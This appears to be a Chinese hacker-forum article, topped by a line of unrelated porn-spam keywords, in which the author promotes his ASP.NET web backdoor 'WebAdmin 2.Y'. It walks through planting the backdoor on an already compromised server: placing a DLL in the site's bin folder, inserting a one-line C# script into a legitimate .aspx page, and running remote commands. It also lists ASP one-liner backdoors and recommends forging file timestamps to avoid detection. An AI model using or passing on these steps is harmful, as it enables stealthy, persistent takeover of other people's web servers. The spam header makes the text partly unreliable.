国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

各位網(wǎng)友好，不知道各位有沒有用過偶的WebAdmin 2.X？嗯，對啦，就是那個ASP.Net環(huán)境下的后門。那是我不成熟的作品，要是有什么不順手的地方還希望多多包涵。呵呵，今天呢，還是讓偶來“黃婆賣瓜自賣自夸”吧，給大家介紹一下WebAdmin的
大家好，不知道各位有沒有用過偶的WebAdmin 2.X？嗯，對啦，就是那個ASP.Net環(huán)境下的后門。那是我不成熟的作品，要是有什么不順手的地方還希望多多包涵。呵呵，今天呢，還是讓偶來“黃婆賣瓜自賣自夸”吧，給大家介紹一下WebAdmin的最新版本——WebAdmin 2.Y。

WebAdmin 2.Y功能上與2.X大致一樣，不過2.Y是C/S版本。呵呵，C/S是大勢所趨嘛。C/S的好處就是能把很短的一段代碼插入正常文件、POST方式控制不留痕跡，真是殺人滅口、居家旅行的必備良藥啊。

廢話少說，看看使用說明先。

既然是ASP.Net下的后門，當然要求ASP.Net環(huán)境。一般來說，Windows2003是默認支持的，Windows2000/XP需要安裝.Net FrameWork。

玩過ASP下C/S后門的朋友都該知道，它的C/S后門放置很簡單，就是隨便找個ASP文件添加代碼“execute request("s")”或“eval request("s")”進去就是，十分簡單。這是利用了函數(shù)execute的功能就是執(zhí)行代碼，但在ASP.Net下沒有類似函數(shù)，實現(xiàn)C/S要復雜一點。

在ASP.Net環(huán)境下可以把代碼編譯成dll文件以提高執(zhí)行效率，這個就類似ASP下的組件機制，不過這里是不用注冊的，只需要把編譯好的dll放在網(wǎng)站根目錄的bin目錄之下即可調用自己開發(fā)的組件。

WebAdmin2.Y就是基于這種組件思想，服務端dll呢就是你現(xiàn)在看到的WebAdmin2Y.dll，這個文件端要放在被控網(wǎng)站W(wǎng)eb目錄的bin子目錄之下。有些系統(tǒng)的Web目錄下沒有bin文件夾，那我們給它新建一個就是；代碼就包含在SampleCSharp.aspx和SampleVB.aspx里。因為ASPX文件可以用VB.Net或C#編寫，所以SampleCSharp.aspx里包含的是C#的代碼，而SampleVB.aspx就是VB.Net的代碼了。使用時根據(jù)實際情況選擇之。

那個webadmin2y.htm就是客戶端了，本地使用。界面全是英文，不要罵我崇洋媚外呀，其實主要目的是為了練練英文，呵呵，你也跟著練練吧^_^

是不是腦子里暈乎乎的？好，下面我給個實例給大家看看這個東東到底怎么用。

偶在本地搭建了個IIS5.1+.Net FrameWork的環(huán)境，Web目錄在E:\MyWeb\。我們要留后門的系統(tǒng)是動網(wǎng)新聞4.1（ASP.Net程序），它的位置是E:\MyWeb\dvnews\。動網(wǎng)新聞的N多dll文件在安裝的時候被要求放置在Web目錄的bin目錄下（即E:\MyWeb\bin\）。

假設偶已經(jīng)入侵了本地主機，現(xiàn)在我想用WebAdmin 2.Y留個C/S Web后門。

首先，應該把WebAdmin2Y.dll這個dll文件放到Web目錄的bin目錄下（這里是E:\MyWeb\bin\），注意名字WebAdmin2Y.dll不要亂改喲，改了就不行了。

接著我們要找個受害文件，一般是.aspx。呵呵，這里我順手就把mail.aspx選中了（真可憐～～）。因為動網(wǎng)新聞是用C#寫的，所以我要用到SampleCSharp.aspx里的代碼。

現(xiàn)在打開文件mail.aspx，看到它的第一行是ASP.Net的頭（以“<%@”開始），這個偶們惹不起，不要動它，在它后面（ASP.Net頭之后html標記之前，這里是第2行）插入SampleCSharp.aspx里的代碼：

<script language="C#" runat="server">

WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");

</script>

這里還要羅嗦兩句：如果你要修改的aspx文件里面含有“<script runat="server">……</script>”標簽的話，你就不需要再復制script標簽了——因為一個aspx文件只能有一個“<script runat="server">……</script>”。編輯文件前最好備個份，小心留后門失敗把人家的網(wǎng)站搞砸了。

呵呵，現(xiàn)在后門已經(jīng)留好了，偶直接訪問mail.aspx文件試試（圖1）。

在直接訪問的情況下顯示正常頁面，ok！

現(xiàn)在偶們運行客戶端（就是那個webadmin2y.htm，圖2）

呵呵，還是先介紹一下客戶端界面。

“The URL”就是你的后門地址啦，這里我們應該填“http://127.0.0.1/dvnews/mail.aspx”；“Password”自然就是你的密碼了。不知道各位注意到?jīng)]有，剛才我們在mail.aspx文件留下的代碼里有個類似MD5的東東——“add6bb58e139be10”。呵呵，它就是你的密碼。這個密碼怎么得到呢？客戶端主界面有個“Get Your Encode Password”鏈接，你點擊它就會彈出個頁面來獲取你自己的密碼（圖3）。這里的“add6bb58e139be10”就是“webadmin”。算法很簡單，就是取密碼的MD5值的前16位（不是該取中間16位嗎？嘿嘿，我故意的）。

“Function”就是功能列表了，這里的功能包括ABOUT（關于）、Attributes（查看和修改文件屬性，新增的）、Command（執(zhí)行CMD）、CloneTime（克隆時間）、Copy File&Folder（復制）、Database（操作MSSQL或者Access數(shù)據(jù)庫）、Delete（刪除）、Edit TextFile（編輯）、File List（列目錄）、New File&Folder（新建）、ReadReg（讀注冊表）、Rename（重命名）、SQLRootKit、Server Variable（基本信息）、UploadFile（上傳）、DownLoad File（下載）。你選擇相應的功能，填好下面的表單內容點“Send”就OK了。

比如現(xiàn)在我執(zhí)行“net user”這個命令（圖4，圖5）

 

 

 

呵呵，看到結果了吧。這里只是給大家一個演示，WebAdmin2.Y更多的功能還是需要你自己下去試哦。

嘿嘿，最后提醒一下，客戶端有個CloneTime功能，可以把某個文件的創(chuàng)建、最后修改時間改得跟另一個文件一樣?？煊盟牡裟銊偛判薷牡奈募臅r間吧^_^

對管理員或者殺毒軟件來說，對付WebAdmin2.Y最簡單的辦法是檢查bin下面有沒有WebAdmin2Y.dll這個文件，但是如果貿然刪除這個dll而不恢復被改動的文件就可能會造成網(wǎng)站應用程序崩潰，還請管理員大叔三思而行咯。